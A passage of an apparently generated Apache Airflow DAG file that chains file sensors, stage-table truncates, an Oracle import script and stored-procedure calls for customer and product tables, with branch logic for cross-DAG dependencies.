dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Project_Decision_Customer"
)
# JOB_TYPE=SQL
my_taskid = "UC_Project_Decision_Customer"
UC_Project_Decision_Customer = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_NA_Customer_Sub_Group_WH"
ODS_UC_NA_Customer_Sub_Group_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_NA_Customer_Sub_Group_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_NA_Customer_Sub_Group_STG"
UC_NA_Customer_Sub_Group_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_NA_Customer_Sub_Group"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_NA_Customer_Sub_Group_LD"
ODS_UC_NA_Customer_Sub_Group_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_NA_Customer_Sub_Group"
)
# JOB_TYPE=SQL
my_taskid = "UC_NA_Customer_Sub_Group"
UC_NA_Customer_Sub_Group = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Group_Customer_Industry_Type_WH"
ODS_UC_Group_Customer_Industry_Type_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Group_Customer_Industry_Type_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Group_Customer_Industry_Type_STG"
UC_Group_Customer_Industry_Type_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Group_Customer_Industry_Type"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Group_Customer_Industry_Type_LD"
ODS_UC_Group_Customer_Industry_Type_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Group_Customer_Industry_Type"
)
# JOB_TYPE=SQL
my_taskid = "UC_Group_Customer_Industry_Type"
UC_Group_Customer_Industry_Type = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Global_Telecom_Operator_WH"
ODS_UC_Global_Telecom_Operator_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Global_Telecom_Operator_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Global_Telecom_Operator_STG"
UC_Global_Telecom_Operator_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Global_Telecom_Operator"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Global_Telecom_Operator_LD"
ODS_UC_Global_Telecom_Operator_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Global_Telecom_Operator"
)
# JOB_TYPE=SQL
my_taskid = "UC_Global_Telecom_Operator"
UC_Global_Telecom_Operator = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Product_Mapping_Table_WH"
ODS_UC_Product_Mapping_Table_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Product_Mapping_Table_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Product_Mapping_Table_STG"
UC_Product_Mapping_Table_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Product_Mapping_Table"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Product_Mapping_Table_LD"
ODS_UC_Product_Mapping_Table_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Product_Mapping_Table"
)
# JOB_TYPE=SQL
my_taskid = "UC_Product_Mapping_Table"
UC_Product_Mapping_Table = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Market_Share_Market_Shipment_WH"
ODS_UC_Market_Share_Market_Shipment_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Market_Share_Market_Shipment_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Market_Share_Market_Shipment_STG"
UC_Market_Share_Market_Shipment_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Market_Share_Market_Shipment"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Market_Share_Market_Shipment_LD"
ODS_UC_Market_Share_Market_Shipment_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Market_Share_Market_Shipment"
)
# JOB_TYPE=SQL
my_taskid = "UC_Market_Share_Market_Shipment"
UC_Market_Share_Market_Shipment = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_WH"
ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_WNC_BI_SHIPMENT_QTY_TABLE_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_WNC_BI_SHIPMENT_QTY_TABLE_STG"
UC_WNC_BI_SHIPMENT_QTY_TABLE_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_WNC_BI_SHIPMENT_QTY_TABLE"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_LD"
ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_WNC_BI_SHIPMENT_QTY_TABLE"
)
# JOB_TYPE=SQL
my_taskid = "UC_WNC_BI_SHIPMENT_QTY_TABLE"
UC_WNC_BI_SHIPMENT_QTY_TABLE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Product_Segment_Map_table_WH"
ODS_UC_Product_Segment_Map_table_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Product_Segment_Map_table_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Product_Segment_Map_table_STG"
UC_Product_Segment_Map_table_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Product_Segment_Map_table"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Product_Segment_Map_table_LD"
ODS_UC_Product_Segment_Map_table_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Product_Segment_Map_table"
)
# JOB_TYPE=SQL
my_taskid = "UC_Product_Segment_Map_table"
UC_Product_Segment_Map_table = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Market_Tam_Product_Map_WH"
ODS_UC_Market_Tam_Product_Map_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Market_Tam_Product_Map_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Market_Tam_Product_Map_STG"
UC_Market_Tam_Product_Map_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Market_Tam_Product_Map"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Market_Tam_Product_Map_LD"
ODS_UC_Market_Tam_Product_Map_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Market_Tam_Product_Map"
)
# JOB_TYPE=SQL
my_taskid = "UC_Market_Tam_Product_Map"
UC_Market_Tam_Product_Map = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_SW_Centric_Product_Model_WH"
ODS_UC_SW_Centric_Product_Model_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=Y_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_SW_Centric_Product_Model_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_SW_Centric_Product_Model_STG"
UC_SW_Centric_Product_Model_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=Y_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_SW_Centric_Product_Model"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_SW_Centric_Product_Model_LD"
ODS_UC_SW_Centric_Product_Model_LD = BashOperator(
task_id=my_taskid,
dag=Y_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_SW_Centric_Product_Model"
)
# JOB_TYPE=SQL
my_taskid = "UC_SW_Centric_Product_Model"
UC_SW_Centric_Product_Model = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=Y_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
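# Each source table above repeats the same four-task chain: a WATCH FileSensor,
# an STG truncate, an LD import via ods_ora_imp.sh, and a SQL stored-procedure
# call. If this generator were refactored, the per-table templated strings
# could come from a single helper. The sketch below is illustrative only;
# ods_task_strings and its return layout are hypothetical, not part of this
# generated file.
def ods_task_strings(table, period="UPD", area="CUS"):
    """Build the templated strings used by the WATCH/STG/LD/SQL tasks
    for one source table. Mirrors the literals repeated above."""
    return {
        # FileSensor filepath for the daily drop file
        "filepath": (
            "{{ var.value.DIR_SOURCE }}%s/%s/%s_{{ds_nodash}}.D"
            % (period, area, table)
        ),
        # Stage-table truncate issued before the import
        "truncate_sql": "TRUNCATE TABLE STAGE." + table,
        # BashOperator command for the Oracle import wrapper
        "bash_command": (
            "{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} "
            "{{var.value.ETLPWD}} {{var.value.DW_HOST}} "
            "{{var.value.DIR_ETLBASE}} {{ds_nodash}} %s %s %s"
            % (period, area, table)
        ),
        # Stored-procedure call with the :END_DT_CHAR bind parameter
        "proc_sql": "Begin SQLEXT." + table + "_SP(:END_DT_CHAR); End;",
    }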
ExternalTaskSensor.ui_color = 'white'
ExternalTaskSensor.ui_fgcolor = 'blue'
# tmpl_search_path = Variable.get("sql_path")
# XSLT:loop: JOB_FLOW_NAME-and-PRE_JOB: External:START{{
def branch_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG","D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG","D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"]
    return ["proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG,
dag=D_ODS_PRD_SRC,
provide_context=True,
)
my_taskid = "proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_ODS_PRD_SRC,
)
# Cross dag sensor
my_taskid = "D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"
D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_ODS_PRD_SRC,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG)
D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG)
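# The branch callables in this section all share one decision rule: always
# follow the proxy task, and additionally run the cross-DAG sensor only when
# the upstream DAG's cadence is at least as coarse as this DAG's and its
# latest run lines up with the current execution date (or when both intervals
# are non-standard but identical). That rule can be isolated as a plain
# function; pick_branch below is an illustrative refactoring, not part of the
# generated file.
def pick_branch(up_interval, my_interval, std_interval,
                up_latest_exec, my_exec, proxy_id, sensor_id):
    """Return the task ids to follow: the proxy alone, or the proxy
    plus the sensor when the upstream schedule is comparable and aligned."""
    up_rank = std_interval.get(up_interval)
    my_rank = std_interval.get(my_interval)
    if up_rank is None or my_rank is None:
        # Non-standard interval(s): run the sensor only when both are
        # non-standard and literally identical.
        if up_rank is None and my_rank is None and up_interval == my_interval:
            return [proxy_id, sensor_id]
    elif up_rank >= my_rank and up_latest_exec == my_exec:
        # Upstream runs no more often than we do and its latest run
        # matches our execution date, so the sensor can succeed.
        return [proxy_id, sensor_id]
    return [proxy_id]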
def branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_ODS_PRD_SRC")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"]
    return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="XXPLM_MODEL",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL)
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_ODS_PRD_SRC")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B","D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B","D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"]
    return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"
D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="MTL_SYSTEM_ITEMS_B",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B)
D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_ODS_PRD_SRC")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"]
    return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="XXPLM_EC_CHANGE_TYPE",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE)
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE)
def branch_D_SDM_PRDxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG","D_SDM_PRDxD_STG_INIT__SYS_STS_STG"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG","D_SDM_PRDxD_STG_INIT__SYS_STS_STG"]
    return ["proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_SDM_PRDxD_STG_INIT__SYS_STS_STG"
BRANCH_D_SDM_PRDxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_STG_INIT__SYS_STS_STG,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG"
proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_STG_INIT__SYS_STS_STG"
D_SDM_PRDxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
